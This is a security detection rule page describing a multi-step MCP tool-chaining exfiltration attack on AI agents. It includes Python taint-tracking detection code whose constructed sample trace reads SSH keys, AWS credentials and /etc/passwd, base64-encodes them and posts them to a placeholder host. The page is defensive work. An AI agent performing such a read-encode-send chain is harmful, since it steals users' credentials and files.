ATR-2026-00063 | critical | Tool Poisoning | experimental
Multi-Skill Chain Attack
Detects attack sequences in which multiple MCP skills are chained together to achieve a malicious outcome that no single skill could accomplish alone. For example: (1) a reconnaissance skill reads sensitive files, (2) an encoding skill obfuscates the data, and (3) a network skill exfiltrates it. Each step appears benign in isolation, but the chain as a whole constitutes data exfiltration.
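The detection idea in the description is a session-level correlation: data read from a sensitive location is tracked across later tool calls, and an alert fires only when that data reaches a network-class tool after passing through an encoding-class tool. The following is an added illustration written for this page, not the rule's actual implementation. The tool-to-class table, the sensitive-path prefixes, the event schema (`inputs` holds the ids of earlier call outputs that were fed into a call) and the sample log are all constructed assumptions; a real deployment would derive them from the MCP server manifests and the agent's trace format.

```python
"""Session-level taint tracking across chained MCP tool calls.

Constructed example for illustration; the tool classes, sensitive path
prefixes, ToolCall schema and sample log are assumptions, not ATR data.
"""
from dataclasses import dataclass
from typing import Dict, List

# Hypothetical mapping of MCP tool names to coarse capability classes.
TOOL_CLASS = {
    "read_file": "recon",
    "list_dir": "recon",
    "base64_encode": "encode",
    "compress": "encode",
    "http_post": "exfil",
    "send_email": "exfil",
    "summarize": "benign",
}

# Path prefixes treated as sensitive in this example.
SENSITIVE_PREFIXES = ("/etc/", "/home/", "/root/", "~/.ssh", "~/.aws")


@dataclass
class ToolCall:
    session: str
    seq: int                 # position of the call within the session
    tool: str
    args: Dict[str, str]
    inputs: List[str]        # output ids of earlier calls consumed here
    output_id: str


@dataclass
class Finding:
    session: str
    chain: List[str]         # tool names in the order they were invoked


def is_sensitive_read(call: ToolCall) -> bool:
    """A recon-class tool touching a sensitive path seeds the taint."""
    path = call.args.get("path", "")
    return TOOL_CLASS.get(call.tool) == "recon" and path.startswith(SENSITIVE_PREFIXES)


def detect_chains(calls: List[ToolCall], max_gap: int = 5) -> List[Finding]:
    """Return one Finding per recon -> encode -> exfil chain in a session.

    Taint is attached to the output of a sensitive read and follows the
    data through every call that consumes it. A finding is emitted when
    tainted data reaches an exfil-class tool and at least one encode-class
    tool sat on the path. max_gap bounds how many calls may separate two
    consecutive steps, so stale taint does not fire far later in a session.
    """
    findings: List[Finding] = []
    by_session: Dict[str, List[ToolCall]] = {}
    for call in sorted(calls, key=lambda c: (c.session, c.seq)):
        by_session.setdefault(call.session, []).append(call)

    for session, seq_calls in by_session.items():
        # taint[output_id] = (tool chain so far, seq of last step, saw_encode)
        taint: Dict[str, tuple] = {}
        for call in seq_calls:
            cls = TOOL_CLASS.get(call.tool, "unknown")
            if is_sensitive_read(call):
                taint[call.output_id] = ([call.tool], call.seq, False)
                continue
            # Pick up taint from any consumed input that is still within the gap window.
            src = next(
                (taint[i] for i in call.inputs
                 if i in taint and call.seq - taint[i][1] <= max_gap),
                None,
            )
            if src is None:
                continue
            chain, _, saw_encode = src
            if cls == "encode":
                taint[call.output_id] = (chain + [call.tool], call.seq, True)
            elif cls == "exfil" and saw_encode:
                findings.append(Finding(session, chain + [call.tool]))
            else:
                # Any other tool passes the taint through to its own output.
                taint[call.output_id] = (chain + [call.tool], call.seq, saw_encode)
    return findings


# Constructed sample trace: s1 is the full chain, s2 reads a sensitive file but
# only summarizes it, s3 encodes and posts non-sensitive data, s4 has the full
# chain but with too large a gap between the read and the encode step.
SAMPLE_CALLS = [
    ToolCall("s1", 1, "read_file", {"path": "/home/dev/.aws/credentials"}, [], "o1"),
    ToolCall("s1", 2, "base64_encode", {}, ["o1"], "o2"),
    ToolCall("s1", 3, "http_post", {"url": "https://example.invalid/upload"}, ["o2"], "o3"),
    ToolCall("s2", 1, "read_file", {"path": "/etc/passwd"}, [], "o4"),
    ToolCall("s2", 2, "summarize", {}, ["o4"], "o5"),
    ToolCall("s3", 1, "read_file", {"path": "/tmp/report.txt"}, [], "o6"),
    ToolCall("s3", 2, "base64_encode", {}, ["o6"], "o7"),
    ToolCall("s3", 3, "http_post", {"url": "https://example.invalid/upload"}, ["o7"], "o8"),
    ToolCall("s4", 1, "read_file", {"path": "/root/.ssh/id_rsa"}, [], "o9"),
    ToolCall("s4", 9, "base64_encode", {}, ["o9"], "o10"),
    ToolCall("s4", 10, "http_post", {"url": "https://example.invalid/upload"}, ["o10"], "o11"),
]


def run_sample() -> List[Finding]:
    return detect_chains(SAMPLE_CALLS)


if __name__ == "__main__":
    for f in run_sample():
        print(f"{f.session}: {' -> '.join(f.chain)}")
```

Only session s1 is reported. Requiring the data to actually flow between the steps (rather than matching on tool names alone) is what keeps s2 and s3 quiet, and the gap window is the knob that trades recall for noise on long sessions; tightening it too far lets an attacker pad the chain with benign calls, so it should be set from observed session lengths rather than left at a guess.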
Severity
critical
Category
Tool Poisoning
Scan target
mcp
Author
ATR Community
Recommended response
block tool, alert, snapshot, escalate
References
OWASP Agentic
ASI02:2026 - Tool Misuse and Exploitation
OWASP LLM
LLM03:2025 - Supply Chain Vulnerabilities
LLM06:2025 - Excessive Agency
MITRE ATLAS
AML.T0024 - Exfiltration via ML Inference API
AML.T0053 - LLM Plugin Compromise